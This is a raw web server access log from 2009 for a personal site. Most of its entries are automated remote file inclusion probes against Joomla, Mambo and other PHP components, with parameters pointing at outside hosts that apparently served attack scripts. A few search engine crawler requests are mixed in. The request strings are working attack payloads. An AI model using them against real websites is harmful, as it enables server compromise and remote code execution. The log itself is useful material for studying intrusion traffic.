219.85.63.226 - - [07/Sep/2009:11:26:14 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:26:14 -0700] "GET /logs/access_080318.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:26:14 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:26:15 -0700] "GET /logs/access_080627.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:26:15 -0700] "GET /logs/access_080228.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:26:16 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 200 19880 "-" "Mozilla/5.0" "www.dmulk.com"
174.143.3.188 - - [07/Sep/2009:11:26:23 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
174.143.3.188 - - [07/Sep/2009:11:26:23 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:26:33 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:26:33 -0700] "GET /logs/access_080620.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:26:33 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 200 19887 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:26:48 -0700] "GET /logs/access_081130.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:26:53 -0700] "GET /bikes/dteel/WeSTOC08/ HTTP/1.0" 200 1245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.38.34.182 - - [07/Sep/2009:11:26:53 -0700] "GET /logs/access_081001.log%20//main.php?_zb_path=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.182 - - [07/Sep/2009:11:26:53 -0700] "GET /main.php?_zb_path=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.182 - - [07/Sep/2009:11:26:53 -0700] "GET /logs//main.php?_zb_path=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:26:58 -0700] "GET /logs/access_080304.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.249.84.5 - - [07/Sep/2009:11:26:58 -0700] "GET /logs/access_080201.log HTTP/1.1" 200 859311 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:27:16 -0700] "GET /logs/access_080620.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:27:16 -0700] "GET /logs/access_090520.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:27:28 -0700] "GET /logs/access_080626.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:27:34 -0700] "GET /logs/access_080620.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.204.51.161 - - [07/Sep/2009:11:27:42 -0700] "GET /logs/access_090627.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.campani.net/logs/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:28:02 -0700] "GET /bikes/dteel/?S=A HTTP/1.0" 200 5230 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:28:03 -0700] "GET /logs/access_080626.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:28:07 -0700] "GET /bikes/dteel/2009_03_29/ HTTP/1.0" 200 977 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:28:12 -0700] "GET /logs/access_080304.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:28:19 -0700] "GET /logs/access_090520.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:35 -0700] "GET /logs/access_090602.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:35 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:36 -0700] "GET /logs/access_090602.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:36 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:36 -0700] "GET /logs/access_090602.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:36 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:36 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:36 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:36 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:36 -0700] "GET /logs/access_090602.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:36 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:36 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:11:28:39 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:11:28:39 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:39 -0700] "GET /logs/access_090602.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:39 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:39 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:40 -0700] "GET /logs/access_090602.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:40 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:40 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:41 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:41 -0700] "GET /logs/access_090602.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:41 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:11:28:41 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:11:28:41 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:42 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:45 -0700] "GET /logs/access_090602.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:45 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:11:28:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:11:28:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:11:28:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:11:28:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:51 -0700] "GET /logs/access_090602.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:51 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:51 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:54 -0700] "GET /logs/access_090602.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:54 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:28:54 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:54 -0700] "GET /logs/access_090602.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:55 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:28:57 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:28:58 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 200 19880 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:28:58 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:29:00 -0700] "GET /logs/access_080228.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.34.182 - - [07/Sep/2009:11:29:03 -0700] "GET /logs/access_081027.log/?DOCUMENT_ROOT=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.182 - - [07/Sep/2009:11:29:03 -0700] "GET /logs/?DOCUMENT_ROOT=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 200 116204 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.182 - - [07/Sep/2009:11:29:03 -0700] "GET /?DOCUMENT_ROOT=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 200 19900 "-" "libwww-perl/5.79" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:29:05 -0700] "GET /logs/access_080627.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:29:05 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:29:06 -0700] "GET /logs/access_080620.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:29:06 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 200 19887 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:29:18 -0700] "GET /bikes/dteel/2008_09_13/ HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:29:48 -0700] "GET /logs/access_080626.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:11:30:04 -0700] "GET /logs/access_090722.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:30:20 -0700] "GET /logs/access_080608.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.38.34.182 - - [07/Sep/2009:11:30:29 -0700] "GET /logs/access_081010.log/?DOCUMENT_ROOT=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.218 - - [07/Sep/2009:11:30:31 -0700] "GET /logs/access_080507.log HTTP/1.0" 200 3350468 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:31:30 -0700] "GET /logs/access_090714.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:31:30 -0700] "GET /logs/access_090330.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:31:30 -0700] "GET /logs/access_090330.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:31:30 -0700] "GET /logs/access_090714.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:31:30 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:31:30 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:31:30 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:31:31 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:33 -0700] "GET /logs/access_090714.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:33 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:33 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:34 -0700] "GET /logs/access_090330.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:40 -0700] "GET /logs/access_090330.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:40 -0700] "GET /logs/access_090714.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:40 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:40 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:46 -0700] "GET /logs/access_090330.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:46 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:46 -0700] "GET /logs/access_090714.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:46 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:31:47 -0700] "GET /bikes/dteel/2009_06_20/ HTTP/1.0" 200 977 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:53 -0700] "GET /logs/access_090330.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:58 -0700] "GET /logs/access_090714.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:31:58 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:32:00 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:32:16 -0700] "GET /bikes/dteel/2008_10_28/ HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.68.229 - - [07/Sep/2009:11:32:21 -0700] "GET /blog/wp-content/gallery/2008-yuma/thumbs/thumbs_003.jpg HTTP/1.1" 200 473562 "-" "Googlebot-Image/1.0" "dmulk.com"
212.227.96.240 - - [07/Sep/2009:11:32:21 -0700] "GET /logs/access_081028.log HTTP/1.1" 200 4236145 "-" "-" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:32:26 -0700] "GET /logs/access_080321.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:32:34 -0700] "GET /bikes/dteel/?D=A HTTP/1.0" 200 5230 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
